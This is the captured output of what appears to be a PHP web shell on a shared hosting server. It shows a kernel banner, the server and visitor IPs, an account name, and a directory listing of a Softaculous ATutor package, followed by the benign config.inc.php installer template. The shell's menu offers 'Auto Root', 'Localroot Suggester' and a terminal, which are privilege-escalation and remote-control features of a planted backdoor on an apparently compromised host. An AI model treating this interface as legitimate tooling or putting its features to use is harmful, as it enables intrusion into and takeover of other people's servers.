Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
atutor /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php53
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php56
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php71
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php81
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php82
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
clone.php
4.95
KB
-rwxr-xr-x
2024-05-02 06:40
config.inc.php
2.9
KB
-rwxr-xr-x
2021-12-23 06:54
edit.php
4.36
KB
-rwxr-xr-x
2024-05-02 06:40
edit.xml
433
B
-rwxr-xr-x
2021-12-23 06:54
fileindex.php
586
B
-rwxr-xr-x
2021-12-23 06:54
import.php
3.25
KB
-rwxr-xr-x
2024-05-02 06:40
info.xml
2.01
KB
-rwxr-xr-x
2024-05-02 06:25
install.js
924
B
-rwxr-xr-x
2021-12-23 06:54
install.php
3.84
KB
-rwxr-xr-x
2024-05-02 06:40
install.xml
1.09
KB
-rwxr-xr-x
2021-12-23 06:54
md5
4.82
KB
-rwxr-xr-x
2024-05-02 06:40
notes.txt
174
B
-rwxr-xr-x
2021-12-23 06:54
upgrade.php
3.81
KB
-rwxr-xr-x
2024-05-02 06:40
upgrade.xml
249
B
-rwxr-xr-x
2021-12-23 06:54
Save
Rename
<?php /************************************************************************/ /* ATutor */ /************************************************************************/ /* Copyright (c) 2002-2018 */ /* http://atutor.ca */ /* */ /* This program is free software. You can redistribute it and/or */ /* modify it under the terms of the GNU General Public License */ /* as published by the Free Software Foundation. */ /************************************************************************/ /* This file was generated by the ATutor 2.2.4 installation script. */ /* File generated [[regtime]] */ /************************************************************************/ /************************************************************************/ /* the database user name */ define('DB_USER', '[[softdbuser]]'); /* the database password */ define('DB_PASSWORD', '[[softdbpass]]'); /* the database host */ define('DB_HOST', '[[softdbhost]]'); /* the database tcp/ip port */ define('DB_PORT', '3306'); /* the database name */ define('DB_NAME', '[[softdb]]'); /* The prefix to add to table names to avoid conflicts with existing */ /* tables. Default: AT_ */ define('TABLE_PREFIX', '[[dbprefix]]'); /* Where the course content files are located. This includes all file */ /* manager and imported files. If security is a concern, it is */ /* recommended that the content directory be moved outside of the web */ /* accessible area. */ define('AT_CONTENT_DIR', '[[softdatadir]]/'); /* Whether or not to use the default php.ini SMTP settings. */ /* If false, then mail will try to be sent using sendmail. */ /* If true, set the username and password for the SMTP user */ define('MAIL_USE_SMTP', false); define('MAIL_SMTP_USER', ''); define('MAIL_SMTP_PASSWORD', ''); /* Whether or not to use the AT_CONTENT_DIR as a protected directory. */ /* If set to FALSE then the content directory will be hard coded */ /* to ATutor_install_dir/content/ and AT_CONTENT_DIR will be ignored. */ /* This option is used for compatability with IIS and Apache 2. */ define('AT_FORCE_GET_FILE', TRUE); /* DO NOT ALTER THIS LAST LINE */ define('AT_INSTALL', TRUE); ?>